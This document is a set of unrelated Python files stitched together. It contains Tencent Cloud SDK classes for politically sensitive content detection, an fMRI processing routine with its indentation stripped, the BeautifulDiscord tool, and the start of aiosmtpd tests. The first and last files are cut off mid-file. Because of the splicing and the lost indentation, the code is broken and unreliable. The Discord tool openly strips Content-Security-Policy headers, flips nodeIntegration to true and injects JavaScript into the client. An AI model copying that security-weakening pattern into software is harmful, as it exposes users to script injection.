            self.OcrReviewInfo = PoliticalOcrReviewTemplateInfo()
            self.OcrReviewInfo._deserialize(params.get("OcrReviewInfo"))
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class PoliticalConfigureInfoForUpdate(AbstractModel):
    """Control parameters for detection of politically sensitive information.
    """
    def __init__(self):
        """
        :param ImgReviewInfo: Control parameters for detecting politically sensitive information in images.
        :type ImgReviewInfo: :class:`tencentcloud.vod.v20180717.models.PoliticalImgReviewTemplateInfoForUpdate`
        :param AsrReviewInfo: Control parameters for ASR-based detection of politically sensitive information.
        :type AsrReviewInfo: :class:`tencentcloud.vod.v20180717.models.PoliticalAsrReviewTemplateInfoForUpdate`
        :param OcrReviewInfo: Control parameters for OCR-based detection of politically sensitive information.
        :type OcrReviewInfo: :class:`tencentcloud.vod.v20180717.models.PoliticalOcrReviewTemplateInfoForUpdate`
        """
        self.ImgReviewInfo = None
        self.AsrReviewInfo = None
        self.OcrReviewInfo = None
    def _deserialize(self, params):
        if params.get("ImgReviewInfo") is not None:
            self.ImgReviewInfo = PoliticalImgReviewTemplateInfoForUpdate()
            self.ImgReviewInfo._deserialize(params.get("ImgReviewInfo"))
        if params.get("AsrReviewInfo") is not None:
            self.AsrReviewInfo = PoliticalAsrReviewTemplateInfoForUpdate()
            self.AsrReviewInfo._deserialize(params.get("AsrReviewInfo"))
        if params.get("OcrReviewInfo") is not None:
            self.OcrReviewInfo = PoliticalOcrReviewTemplateInfoForUpdate()
            self.OcrReviewInfo._deserialize(params.get("OcrReviewInfo"))
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class PoliticalImgReviewTemplateInfo(AbstractModel):
    """Control parameters for detecting politically sensitive information in images
    """
    def __init__(self):
        """
        :param Switch: Switch of the image-based politically sensitive information detection task. Valid values:
<li>ON: enables the task;</li>
<li>OFF: disables the task.</li>
        :type Switch: str
        :param LabelSet: Filter tags for the detection results. A result is returned if it contains any of the selected tags; if the filter tag list is empty, all detection results are returned. Valid values:
<li>violation_photo: banned icons;</li>
<li>politician: political figures;</li>
<li>entertainment: entertainment celebrities;</li>
<li>sport: sports figures;</li>
<li>entrepreneur: business figures;</li>
<li>scholar: educators and scholars;</li>
<li>celebrity: well-known figures;</li>
<li>military: military figures.</li>
        :type LabelSet: list of str
        :param BlockConfidence: Score threshold for a suspected violation. If intelligent review reaches this score or higher, the content is deemed a suspected violation. Defaults to 97 if left unset. Value range: 0-100.
        :type BlockConfidence: int
        :param ReviewConfidence: Score threshold at or above which human review is deemed necessary. Defaults to 95 if left unset. Value range: 0-100.
        :type ReviewConfidence: int
        """
        self.Switch = None
        self.LabelSet = None
        self.BlockConfidence = None
        self.ReviewConfidence = None
    def _deserialize(self, params):
        self.Switch = params.get("Switch")
        self.LabelSet = params.get("LabelSet")
        self.BlockConfidence = params.get("BlockConfidence")
        self.ReviewConfidence = params.get("ReviewConfidence")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class PoliticalImgReviewTemplateInfoForUpdate(AbstractModel):
    """Control parameters for detecting politically sensitive information in images.
    """
    def __init__(self):
        """
        :param Switch: Switch of the image-based politically sensitive information detection task. Valid values:
<li>ON: enables the task;</li>
<li>OFF: disables the task.</li>
        :type Switch: str
        :param LabelSet: Filter tags for the detection results. A result is returned if it contains any of the selected tags; if the filter tag list is empty, all detection results are returned. Valid values:
<li>violation_photo: banned icons;</li>
<li>politician: political figures;</li>
<li>entertainment: entertainment celebrities;</li>
<li>sport: sports figures;</li>
<li>entrepreneur: business figures;</li>
<li>scholar: educators and scholars;</li>
<li>celebrity: well-known figures;</li>
<li>military: military figures.</li>
        :type LabelSet: list of str
        :param BlockConfidence: Score threshold for a suspected violation. If intelligent review reaches this score or higher, the content is deemed a suspected violation. Value range: 0-100.
        :type BlockConfidence: int
        :param ReviewConfidence: Score threshold at or above which human review is deemed necessary. Value range: 0-100.
        :type ReviewConfidence: int
        """
        self.Switch = None
        self.LabelSet = None
        self.BlockConfidence = None
        self.ReviewConfidence = None
    def _deserialize(self, params):
        self.Switch = params.get("Switch")
        self.LabelSet = params.get("LabelSet")
        self.BlockConfidence = params.get("BlockConfidence")
        self.ReviewConfidence = params.get("ReviewConfidence")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
| |
timestep"
)
else:
if nim_hdr.get_xyzt_units()[1] == "msec":
fmritr = thesizes[4] / 1000.0
else:
fmritr = thesizes[4]
if optiondict["realtr"] > 0.0:
fmritr = optiondict["realtr"]
# check to see if we need to adjust the oversample factor
if optiondict["oversampfactor"] < 0:
optiondict["oversampfactor"] = int(np.max([np.ceil(fmritr / 0.5), 1]))
LGR.info(f"oversample factor set to {optiondict['oversampfactor']}")
oversamptr = fmritr / optiondict["oversampfactor"]
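    # worked example: with fmritr = 1.5 s and oversampfactor left unset (< 0),
    # the factor becomes int(max(ceil(1.5 / 0.5), 1)) = 3, so oversamptr = 0.5 s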
LGR.verbose(f"fmri data: {timepoints} timepoints, tr = {fmritr}, oversamptr = {oversamptr}")
LGR.info(f"{numspatiallocs} spatial locations, {timepoints} timepoints")
TimingLGR.info("Finish reading fmrifile")
# if the user has specified start and stop points, limit check, then use these numbers
validstart, validend = tide_util.startendcheck(
timepoints, optiondict["startpoint"], optiondict["endpoint"]
)
if abs(optiondict["lagmin"]) > (validend - validstart + 1) * fmritr / 2.0:
raise ValueError(
f"magnitude of lagmin exceeds {(validend - validstart + 1) * fmritr / 2.0} - invalid"
)
if abs(optiondict["lagmax"]) > (validend - validstart + 1) * fmritr / 2.0:
raise ValueError(
f"magnitude of lagmax exceeds {(validend - validstart + 1) * fmritr / 2.0} - invalid"
)
# do spatial filtering if requested
if optiondict["gausssigma"] < 0.0 and not optiondict["textio"]:
# set gausssigma automatically
optiondict["gausssigma"] = np.mean([xdim, ydim, slicethickness]) / 2.0
if optiondict["gausssigma"] > 0.0:
LGR.info(
f"applying gaussian spatial filter to timepoints {validstart} "
f"to {validend} with sigma={optiondict['gausssigma']}"
)
reportstep = 10
for i in range(validstart, validend + 1):
if (i % reportstep == 0 or i == validend) and optiondict["showprogressbar"]:
tide_util.progressbar(
i - validstart + 1,
validend - validstart + 1,
label="Percent complete",
)
nim_data[:, :, :, i] = tide_filt.ssmooth(
xdim,
ydim,
slicethickness,
optiondict["gausssigma"],
nim_data[:, :, :, i],
)
print()
TimingLGR.info("End 3D smoothing")
# reshape the data and trim to a time range, if specified. Check for special case of no trimming to save RAM
fmri_data = nim_data.reshape((numspatiallocs, timepoints))[:, validstart : validend + 1]
validtimepoints = validend - validstart + 1
# detect zero mean data
optiondict["dataiszeromean"] = checkforzeromean(fmri_data)
if optiondict["dataiszeromean"]:
LGR.warning(
"WARNING: dataset is zero mean - forcing variance masking and no refine prenormalization. "
"Consider specifying a global mean and correlation mask."
)
optiondict["refineprenorm"] = "None"
optiondict["globalmaskmethod"] = "variance"
# read in the optional masks
tide_util.logmem("before setting masks")
internalglobalmeanincludemask = None
internalglobalmeanexcludemask = None
internalrefineincludemask = None
internalrefineexcludemask = None
if optiondict["globalmeanincludename"] is not None:
LGR.info("constructing global mean include mask")
theglobalmeanincludemask = readamask(
optiondict["globalmeanincludename"],
nim_hdr,
xsize,
istext=optiondict["textio"],
valslist=optiondict["globalmeanincludevals"],
maskname="global mean include",
)
internalglobalmeanincludemask = theglobalmeanincludemask.reshape(numspatiallocs)
if tide_stats.getmasksize(internalglobalmeanincludemask) == 0:
raise ValueError(
"ERROR: there are no voxels in the global mean include mask - exiting"
)
if optiondict["globalmeanexcludename"] is not None:
LGR.info("constructing global mean exclude mask")
theglobalmeanexcludemask = readamask(
optiondict["globalmeanexcludename"],
nim_hdr,
xsize,
istext=optiondict["textio"],
valslist=optiondict["globalmeanexcludevals"],
maskname="global mean exclude",
)
internalglobalmeanexcludemask = theglobalmeanexcludemask.reshape(numspatiallocs)
if tide_stats.getmasksize(internalglobalmeanexcludemask) == numspatiallocs:
raise ValueError(
"ERROR: the global mean exclude mask does not leave any voxels - exiting"
)
if (internalglobalmeanincludemask is not None) and (internalglobalmeanexcludemask is not None):
if (
tide_stats.getmasksize(
internalglobalmeanincludemask * (1 - internalglobalmeanexcludemask)
)
== 0
):
raise ValueError(
"ERROR: the global mean include and exclude masks not leave any voxels between them - exiting"
)
if optiondict["refineincludename"] is not None:
LGR.info("constructing refine include mask")
therefineincludemask = readamask(
optiondict["refineincludename"],
nim_hdr,
xsize,
istext=optiondict["textio"],
valslist=optiondict["refineincludevals"],
maskname="refine include",
)
internalrefineincludemask = therefineincludemask.reshape(numspatiallocs)
if tide_stats.getmasksize(internalrefineincludemask) == 0:
raise ValueError("ERROR: there are no voxels in the refine include mask - exiting")
if optiondict["refineexcludename"] is not None:
LGR.info("constructing refine exclude mask")
therefineexcludemask = readamask(
optiondict["refineexcludename"],
nim_hdr,
xsize,
istext=optiondict["textio"],
valslist=optiondict["refineexcludevals"],
maskname="refine exclude",
)
internalrefineexcludemask = therefineexcludemask.reshape(numspatiallocs)
if tide_stats.getmasksize(internalrefineexcludemask) == numspatiallocs:
raise ValueError("ERROR: the refine exclude mask does not leave any voxels - exiting")
tide_util.logmem("after setting masks")
# read or make a mask of where to calculate the correlations
tide_util.logmem("before selecting valid voxels")
threshval = tide_stats.getfracvals(fmri_data[:, :], [0.98])[0] / 25.0
LGR.info("constructing correlation mask")
if optiondict["corrmaskincludename"] is not None:
thecorrmask = readamask(
optiondict["corrmaskincludename"],
nim_hdr,
xsize,
istext=optiondict["textio"],
valslist=optiondict["corrmaskincludevals"],
maskname="correlation",
)
corrmask = np.uint16(np.where(thecorrmask > 0, 1, 0).reshape(numspatiallocs))
else:
# check to see if the data has been demeaned
meanim = np.mean(fmri_data, axis=1)
stdim = np.std(fmri_data, axis=1)
if fileiscifti:
corrmask = np.uint(nim_data[:, 0] * 0 + 1)
else:
if np.mean(stdim) < np.mean(meanim):
LGR.info("generating correlation mask from mean image")
corrmask = np.uint16(masking.compute_epi_mask(nim).dataobj.reshape(numspatiallocs))
else:
LGR.info("generating correlation mask from std image")
corrmask = np.uint16(
tide_stats.makemask(stdim, threshpct=optiondict["corrmaskthreshpct"])
)
if tide_stats.getmasksize(corrmask) == 0:
raise ValueError("ERROR: there are no voxels in the correlation mask - exiting")
optiondict["corrmasksize"] = tide_stats.getmasksize(corrmask)
if internalrefineincludemask is not None:
if internalrefineexcludemask is not None:
if (
tide_stats.getmasksize(
corrmask * internalrefineincludemask * (1 - internalrefineexcludemask)
)
== 0
):
raise ValueError(
"ERROR: the refine include and exclude masks not leave any voxels in the corrmask - exiting"
)
else:
if tide_stats.getmasksize(corrmask * internalrefineincludemask) == 0:
raise ValueError(
"ERROR: the refine include mask does not leave any voxels in the corrmask - exiting"
)
else:
if internalrefineexcludemask is not None:
if tide_stats.getmasksize(corrmask * (1 - internalrefineexcludemask)) == 0:
raise ValueError(
"ERROR: the refine exclude mask does not leave any voxels in the corrmask - exiting"
)
if optiondict["nothresh"]:
corrmask *= 0
corrmask += 1
threshval = -10000000.0
if optiondict["savecorrmask"] and not (fileiscifti or optiondict["textio"]):
theheader = copy.deepcopy(nim_hdr)
theheader["dim"][0] = 3
theheader["dim"][4] = 1
if optiondict["bidsoutput"]:
savename = f"{outputname}_desc-processed_mask"
else:
savename = f"{outputname}_corrmask"
tide_io.savetonifti(corrmask.reshape(xsize, ysize, numslices), theheader, savename)
LGR.verbose(f"image threshval = {threshval}")
validvoxels = np.where(corrmask > 0)[0]
numvalidspatiallocs = np.shape(validvoxels)[0]
LGR.info(f"validvoxels shape = {numvalidspatiallocs}")
fmri_data_valid = fmri_data[validvoxels, :] + 0.0
LGR.info(f"original size = {np.shape(fmri_data)}, trimmed size = {np.shape(fmri_data_valid)}")
if internalglobalmeanincludemask is not None:
internalglobalmeanincludemask_valid = 1.0 * internalglobalmeanincludemask[validvoxels]
del internalglobalmeanincludemask
LGR.info(
"internalglobalmeanincludemask_valid has size: "
f"{internalglobalmeanincludemask_valid.size}"
)
else:
internalglobalmeanincludemask_valid = None
if internalglobalmeanexcludemask is not None:
internalglobalmeanexcludemask_valid = 1.0 * internalglobalmeanexcludemask[validvoxels]
del internalglobalmeanexcludemask
LGR.info(
"internalglobalmeanexcludemask_valid has size: "
f"{internalglobalmeanexcludemask_valid.size}"
)
else:
internalglobalmeanexcludemask_valid = None
if internalrefineincludemask is not None:
internalrefineincludemask_valid = 1.0 * internalrefineincludemask[validvoxels]
del internalrefineincludemask
LGR.info(
"internalrefineincludemask_valid has size: " f"{internalrefineincludemask_valid.size}"
)
else:
internalrefineincludemask_valid = None
if internalrefineexcludemask is not None:
internalrefineexcludemask_valid = 1.0 * internalrefineexcludemask[validvoxels]
del internalrefineexcludemask
LGR.info(
"internalrefineexcludemask_valid has size: " f"{internalrefineexcludemask_valid.size}"
)
else:
internalrefineexcludemask_valid = None
tide_util.logmem("after selecting valid voxels")
# move fmri_data_valid into shared memory
if optiondict["sharedmem"]:
LGR.info("moving fmri data to shared memory")
TimingLGR.info("Start moving fmri_data to shared memory")
numpy2shared_func = addmemprofiling(
numpy2shared, optiondict["memprofile"], "before fmri data move"
)
fmri_data_valid = numpy2shared_func(fmri_data_valid, rt_floatset)
TimingLGR.info("End moving fmri_data to shared memory")
# get rid of memory we aren't using
tide_util.logmem("before purging full sized fmri data")
meanvalue = np.mean(
nim_data.reshape((numspatiallocs, timepoints))[:, validstart : validend + 1],
axis=1,
)
del fmri_data
del nim_data
gc.collect()
tide_util.logmem("after purging full sized fmri data")
# filter out motion regressors here
if optiondict["motionfilename"] is not None:
LGR.info("regressing out motion")
TimingLGR.info("Motion filtering start")
(motionregressors, motionregressorlabels, fmri_data_valid,) = tide_glmpass.motionregress(
optiondict["motionfilename"],
fmri_data_valid,
fmritr,
motstart=validstart,
motend=validend + 1,
position=optiondict["mot_pos"],
deriv=optiondict["mot_deriv"],
derivdelayed=optiondict["mot_delayderiv"],
)
TimingLGR.info(
"Motion filtering end",
{
"message2": fmri_data_valid.shape[0],
"message3": "voxels",
},
)
if optiondict["bidsoutput"]:
tide_io.writebidstsv(
f"{outputname}_desc-orthogonalizedmotion_timeseries",
motionregressors,
1.0 / fmritr,
columns=motionregressorlabels,
append=True,
)
else:
tide_io.writenpvecs(motionregressors, f"{outputname}_orthogonalizedmotion.txt")
if optiondict["memprofile"]:
memcheckpoint("...done")
else:
tide_util.logmem("after motion glm filter")
if optiondict["savemotionfiltered"]:
outfmriarray = np.zeros((numspatiallocs, validtimepoints), dtype=rt_floattype)
outfmriarray[validvoxels, :] = fmri_data_valid[:, :]
if optiondict["textio"]:
tide_io.writenpvecs(
outfmriarray.reshape((numspatiallocs, validtimepoints)),
f"{outputname}_motionfiltered.txt",
)
else:
if optiondict["bidsoutput"]:
savename = f"{outputname}_desc-motionfiltered"
else:
savename = f"{outputname}_motionfiltered"
tide_io.savetonifti(
outfmriarray.reshape((xsize, ysize, numslices, validtimepoints)),
nim_hdr,
savename,
)
# read in the timecourse to resample
TimingLGR.info("Start of reference prep")
if filename is None:
LGR.info("no regressor file specified - will use the global mean regressor")
optiondict["useglobalref"] = True
else:
optiondict["useglobalref"] = False
# calculate the global mean whether we intend to use it or not
meanfreq = 1.0 / fmritr
meanperiod = 1.0 * fmritr
meanstarttime = 0.0
meanvec, meanmask = getglobalsignal(
fmri_data_valid,
optiondict,
includemask=internalglobalmeanincludemask_valid,
excludemask=internalglobalmeanexcludemask_valid,
pcacomponents=optiondict["globalpcacomponents"],
)
# now set the regressor that we'll use
if optiondict["useglobalref"]:
LGR.info("using global mean as probe regressor")
inputfreq = meanfreq
inputperiod = meanperiod
inputstarttime = meanstarttime
inputvec = meanvec
fullmeanmask = np.zeros(numspatiallocs, dtype=rt_floattype)
fullmeanmask[validvoxels] = meanmask[:]
if optiondict["bidsoutput"]:
savename = f"{outputname}_desc-globalmean_mask"
else:
savename = f"{outputname}_meanmask"
if fileiscifti:
theheader = copy.deepcopy(nim_hdr)
timeindex = theheader["dim"][0] - 1
spaceindex = theheader["dim"][0]
theheader["dim"][timeindex] = 1
theheader["dim"][spaceindex] = numspatiallocs
tide_io.savetocifti(
fullmeanmask,
cifti_hdr,
theheader,
savename,
isseries=False,
names=["meanmask"],
)
elif optiondict["textio"]:
            tide_io.writenpvecs(
                fullmeanmask,
                savename + ".txt",
            )
#!/usr/bin/env python
import os
import shutil
import argparse
import textwrap
import subprocess
import psutil
import sys
from beautifuldiscord.asar import Asar
class DiscordProcess:
def __init__(self, path, exe):
self.path = path
self.exe = exe
self.processes = []
def terminate(self):
for process in self.processes:
# terrible
process.kill()
def launch(self):
with open(os.devnull, 'w') as f:
subprocess.Popen([os.path.join(self.path, self.exe)], stdout=f, stderr=subprocess.STDOUT)
@property
def resources_path(self):
if sys.platform == 'darwin':
# OS X has a different resources path
# Application directory is under <[EXE].app/Contents/MacOS/[EXE]>
# where [EXE] is Discord Canary, Discord PTB, etc
# Resources directory is under </Applications/[EXE].app/Contents/Resources/app.asar>
# So we need to fetch the folder based on the executable path.
# Go two directories up and then go to Resources directory.
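            # e.g. /Applications/Discord Canary.app/Contents/MacOS/Discord Canary
            #      -> /Applications/Discord Canary.app/Contents/Resources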
return os.path.abspath(os.path.join(self.path, '..', 'Resources'))
return os.path.join(self.path, 'resources')
@property
def script_path(self):
if sys.platform == 'win32':
# On Windows:
# path is C:\Users\<UserName>\AppData\Local\<Discord>\app-<version>
# script: C:\Users\<UserName>\AppData\Roaming\<DiscordLower>\<version>\modules\discord_desktop_core
# don't try this at home
path = os.path.split(self.path)
app_version = path[1].replace('app-', '')
discord_version = os.path.basename(path[0])
return os.path.expandvars(os.path.join('%AppData%',
discord_version,
app_version,
r'modules\discord_desktop_core'))
elif sys.platform == 'darwin':
# macOS doesn't encode the app version in the path, but rather it stores it in the Info.plist
# which we can find in the root directory e.g. </Applications/[EXE].app/Contents/Info.plist>
# After we obtain the Info.plist, we parse it for the `CFBundleVersion` key
# The actual path ends up being in ~/Library/Application Support/<DiscordLower>/<version>/modules/...
import plistlib as plist
info = os.path.abspath(os.path.join(self.path, '..', 'Info.plist'))
with open(info, 'rb') as fp:
info = plist.load(fp)
app_version = info['CFBundleVersion']
discord_version = info['CFBundleName'].replace(' ', '').lower()
return os.path.expanduser(os.path.join('~/Library/Application Support',
discord_version,
app_version,
'modules/discord_desktop_core'))
else:
# Discord is available typically on /opt/discord-canary directory
# The modules are under ~/.config/discordcanary/0.0.xx/modules/discord_desktop_core
# To get the version number we have to iterate over ~/.config/discordcanary and find the
# folder with the highest version number
discord_version = os.path.basename(self.path).replace('-', '')
config = os.path.expanduser(os.path.join('~/.config', discord_version))
versions_found = {}
for subdirectory in os.listdir(config):
if not os.path.isdir(os.path.join(config, subdirectory)):
continue
try:
# versions are A.B.C
version_info = tuple(int(x) for x in subdirectory.split('.'))
except Exception as e:
# shucks
continue
else:
versions_found[subdirectory] = version_info
if len(versions_found) == 0:
raise RuntimeError('Could not find discord application version under "{}".'.format(config))
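            # max() over the (major, minor, patch) tuples picks the numerically
            # highest version, e.g. (0, 0, 12) beats (0, 0, 9) even though
            # '0.0.12' sorts before '0.0.9' as a string.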
app_version = max(versions_found.items(), key=lambda t: t[1])
return os.path.join(config, app_version[0], 'modules', 'discord_desktop_core')
@property
def script_file(self):
return os.path.join(self.script_path, 'core', 'app', 'mainScreen.js')
def extract_asar():
try:
with Asar.open('./core.asar') as a:
try:
a.extract('./core')
except FileExistsError:
answer = input('asar already extracted, overwrite? (Y/n): ')
if answer.lower().startswith('n'):
print('Exiting.')
return False
shutil.rmtree('./core')
a.extract('./core')
shutil.move('./core.asar', './original_core.asar')
except FileNotFoundError as e:
        print('WARNING: core.asar not found')
return True
def repack_asar():
try:
with Asar.from_path('./core') as a:
with open('./core.asar', 'wb') as fp:
a.fp.seek(0)
fp.write(a.fp.read())
shutil.rmtree('./core')
except Exception as e:
print('ERROR: {0.__class__.__name__} {0}'.format(e))
def parse_args():
description = """\
Unpacks Discord and adds CSS/JavaScript hot-reloading.
    Discord has to be open for this to work. When this tool is run,
Discord will close and then be relaunched when the tool completes.
CSS files must have the ".css" extension, and JavaScript files must
have the ".js" extension.
"""
parser = argparse.ArgumentParser(description=description.strip())
parser.add_argument('--css', metavar='file_or_dir', help='Location of the CSS file or directory to watch')
parser.add_argument('--js', metavar='file_or_dir', help='Location of the JavaScript file or directory to watch')
parser.add_argument('--revert', action='store_true', help='Reverts any changes made to Discord (does not delete CSS)')
args = parser.parse_args()
return args
def discord_process():
executables = {}
for proc in psutil.process_iter():
try:
(path, exe) = os.path.split(proc.exe())
except (psutil.Error, OSError):
pass
else:
if exe.startswith('Discord') and not exe.endswith('Helper'):
entry = executables.get(exe)
if entry is None:
entry = executables[exe] = DiscordProcess(path=path, exe=exe)
entry.processes.append(proc)
if len(executables) == 0:
raise RuntimeError('Could not find Discord executable.')
if len(executables) == 1:
r = executables.popitem()
print('Found {0.exe} under {0.path}'.format(r[1]))
return r[1]
lookup = list(executables)
for index, exe in enumerate(lookup):
print('%s: Found %s' % (index, exe))
while True:
index = input("Discord executable to use (number): ")
try:
index = int(index)
except ValueError as e:
print('Invalid index passed')
else:
if index >= len(lookup) or index < 0:
print('Index too big (or small)')
else:
key = lookup[index]
return executables[key]
def revert_changes(discord):
try:
shutil.move('./original_core.asar', './core.asar')
shutil.move('./original_index.js', './index.js')
except FileNotFoundError as e:
print('No changes to revert.')
else:
print('Reverted changes, no more CSS hot-reload :(')
discord.launch()
def remove_csp():
shutil.move('./index.js', './original_index.js')
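    # The replacement index.js below strips any Content-Security-Policy
    # response header so the injected local CSS/JS isn't blocked, then hands
    # everything else back to the original core.asar.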
no_csp_script = textwrap.dedent("""\
require("electron").session.defaultSession.webRequest.onHeadersReceived(function(details, callback) {
const responseHeaders = {};
for (let header in details.responseHeaders) {
if (!header.match(/^content-security/i)) {
responseHeaders[header] = details.responseHeaders[header]
}
        }
        callback({
cancel: false,
responseHeaders
});
});
module.exports = require('./core.asar');""")
with open('./index.js', 'w', encoding='utf-8') as f:
f.write(no_csp_script)
def main():
args = parse_args()
try:
discord = discord_process()
except Exception as e:
print(str(e))
return
if args.css:
args.css = os.path.abspath(args.css)
else:
args.css = os.path.join(discord.script_path, 'discord-custom.css')
if args.js:
args.js = os.path.abspath(args.js)
else:
args.js = os.path.join(discord.script_path, 'discord-custom.js')
os.chdir(discord.script_path)
args.css = os.path.abspath(args.css)
args.js = os.path.abspath(args.js)
discord.terminate()
if args.revert:
return revert_changes(discord)
if not os.path.exists(args.css):
with open(args.css, 'w', encoding='utf-8') as f:
f.write('/* put your custom css here. */\n')
if not os.path.exists(args.js):
with open(args.js, 'w', encoding='utf-8') as f:
f.write('// put your custom js here.\n')
if not extract_asar():
discord.launch()
return
injection_script = textwrap.dedent("""\
window._fs = require("fs");
window._path = require("path");
window._fileWatcherCSS = null;
window._fileWatcherJS = null;
window._styleTag = {};
window._scriptTag = {};
window.applyCSS = function(path, name) { window._apply(path, name, "CSS"); };
window.applyJS = function(path, name) { window._apply(path, name, "JS"); };
window._apply = function(path, name, type) {
var elementType = type == "CSS" ? "style" : "script";
var tag = type == "CSS" ? window._styleTag : window._scriptTag;
var customContent = window._fs.readFileSync(path, "utf-8");
if (!tag.hasOwnProperty(name)) {
tag[name] = document.createElement(elementType);
document.head.appendChild(tag[name]);
}
tag[name].innerHTML = customContent;
}
window.clearCSS = function(name) { window._clear(name, "CSS"); };
window.clearJS = function(name) { window._clear(name, "JS"); };
    window._clear = function(name, type) {
var tag = type == "CSS" ? window._styleTag : window._scriptTag;
if (tag.hasOwnProperty(name)) {
tag[name].innerHTML = "";
tag[name].parentElement.removeChild(tag[name]);
delete tag[name];
}
}
window.watchCSS = function(path) { window.watch(path, "CSS"); };
window.watchJS = function(path) { window.watch(path, "JS"); };
window.watch = function(path, type) {
var ext = '.' + type.toLowerCase();
var fnApply = window["apply" + type];
var fnClear = window["clear" + type];
var watcher = window["_fileWatcher" + type];
if (window._fs.lstatSync(path).isDirectory()) {
files = window._fs.readdirSync(path);
dirname = path;
} else {
files = [window._path.basename(path)];
dirname = window._path.dirname(path);
}
for (var i = 0; i < files.length; i++) {
var file = files[i];
if (file.endsWith(ext)) {
fnApply(window._path.join(dirname, file), file)
}
}
    if (watcher === null) {
      // Persist the watcher on window so tearDown() can find and close it.
      window["_fileWatcher" + type] = window._fs.watch(path, { encoding: "utf-8" },
        function(eventType, filename) {
          if (!filename.endsWith(ext)) return;
          path = window._path.join(dirname, filename);
          if (eventType === "rename" && !window._fs.existsSync(path)) {
            fnClear(filename);
          } else {
            fnApply(window._path.join(dirname, filename), filename);
          }
        });
    }
};
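    // watch() applies every matching file once up front; the fs.watch
    // callback then clears a tag when its file disappears (a "rename" event
    // with no file left on disk) and re-applies the file on any other change.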
window.tearDownCSS = function() { window.tearDown("CSS"); };
window.tearDownJS = function() { window.tearDown("JS"); };
window.tearDown = function(type) {
var watcher = window["_fileWatcher" + type];
var tag = type == "CSS" ? window._styleTag : window._scriptTag;
var fnClear = window["clear" + type];
for (var key in tag) {
if (tag.hasOwnProperty(key)) {
fnClear(key);
}
}
      if (watcher !== null) { watcher.close(); window["_fileWatcher" + type] = null; }
};
window.removeDuplicateCSS = function(){
const styles = [...document.getElementsByTagName("style")];
const styleTags = window._styleTag;
for(let key in styleTags){
for (var i = 0; i < styles.length; i++) {
const keyStyle = styleTags[key];
const curStyle = styles[i];
if(curStyle !== keyStyle) {
const compare = keyStyle.innerText.localeCompare(curStyle.innerText);
if(compare === 0){
const parent = curStyle.parentElement;
parent.removeChild(curStyle);
}
}
}
}
};
window.applyAndWatchCSS = function(path) { window.applyAndWatch(path, "CSS"); };
window.applyAndWatchJS = function(path) { window.applyAndWatch(path, "JS"); };
window.applyAndWatch = function(path, type) {
window.tearDown(type);
window.watch(path, type);
};
window.applyAndWatchCSS('%s');
window.applyAndWatchJS('%s');
window.removeDuplicateCSS();
""" % (args.css.replace('\\', '\\\\'), args.js.replace('\\', '\\\\')))
injection_path = os.path.expanduser(os.path.join('~', '.beautifuldiscord'))
if not os.path.exists(injection_path):
os.mkdir(injection_path)
injection_file = os.path.abspath(os.path.join(injection_path, 'injection.js'))
with open(injection_file, 'w', encoding='utf-8') as f:
f.write(injection_script)
reload_script = textwrap.dedent("""\
mainWindow.webContents.on('dom-ready', function () {
var _fs = require('fs');
mainWindow.webContents.executeJavaScript(
_fs.readFileSync('%s', 'utf-8')
);
});
""" % injection_file.replace('\\', '\\\\'))
with open(discord.script_file, 'rb') as f:
entire_thing = f.read()
index = entire_thing.index(b"mainWindow.on('blur'")
if index == -1:
# failed replace for some reason?
print('warning: nothing was done.\n' \
'note: blur event was not found for the injection point.')
revert_changes(discord)
discord.launch()
return
# yikes
to_write = entire_thing[:index] + reload_script.encode('utf-8') + entire_thing[index:]
to_write = to_write.replace(b'nodeIntegration: false', b'nodeIntegration: true', 1)
with open(discord.script_file, 'wb') as f:
f.write(to_write)
# repack the asar so discord stops complaining
repack_asar()
# finally, remove csp by injecting into index.js
remove_csp()
    print(
        '\nDone!\n' +
        '\nYou may now edit your custom CSS and JS files; changes are applied when saved.'
    )
    discord.launch()
import os
import sys
import unittest
from aiosmtpd.controller import Controller
from aiosmtpd.handlers import AsyncMessage, Debugging, Mailbox, Proxy, Sink
from aiosmtpd.smtp import SMTP as Server
from contextlib import ExitStack
from io import StringIO
from mailbox import Maildir
from operator import itemgetter
from smtplib import SMTP, SMTPDataError, SMTPRecipientsRefused
from tempfile import TemporaryDirectory
from unittest.mock import call, patch
CRLF = '\r\n'
class DecodingController(Controller):
def factory(self):
return Server(self.handler, decode_data=True)
class AUTHDecodingController(Controller):
def factory(self):
return Server(self.handler, decode_data=True, auth_require_tls=False)
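# These controllers override factory() so the SMTP server under test decodes
# DATA payloads to str (and, in the AUTH variant, allows authentication
# without TLS); the stock Controller leaves payloads as bytes.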
class DataHandler:
def __init__(self):
self.content = None
self.original_content = None
async def handle_DATA(self, server, session, envelope):
self.content = envelope.content
self.original_content = envelope.original_content
return '250 OK'
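# envelope.content is the message body as delivered (str when the server was
# created with decode_data=True, bytes otherwise), while
# envelope.original_content always preserves the raw bytes; the tests below
# assert on exactly this distinction.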
class TestDebugging(unittest.TestCase):
def setUp(self):
self.stream = StringIO()
handler = Debugging(self.stream)
controller = DecodingController(handler)
controller.start()
self.addCleanup(controller.stop)
self.address = (controller.hostname, controller.port)
def test_debugging(self):
with ExitStack() as resources:
client = resources.enter_context(SMTP(*self.address))
peer = client.sock.getsockname()
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
Testing
""")
text = self.stream.getvalue()
self.assertMultiLineEqual(text, """\
---------- MESSAGE FOLLOWS ----------
mail options: ['SIZE=102']
From: <NAME> <<EMAIL>>
To: <NAME> <<EMAIL>>
Subject: A test
X-Peer: {!r}
Testing
------------ END MESSAGE ------------
""".format(peer))
class TestDebuggingBytes(unittest.TestCase):
def setUp(self):
self.stream = StringIO()
handler = Debugging(self.stream)
controller = Controller(handler)
controller.start()
self.addCleanup(controller.stop)
self.address = (controller.hostname, controller.port)
def test_debugging(self):
with ExitStack() as resources:
client = resources.enter_context(SMTP(*self.address))
peer = client.sock.getsockname()
client.sendmail('<EMAIL>', ['<EMAIL>'], """\
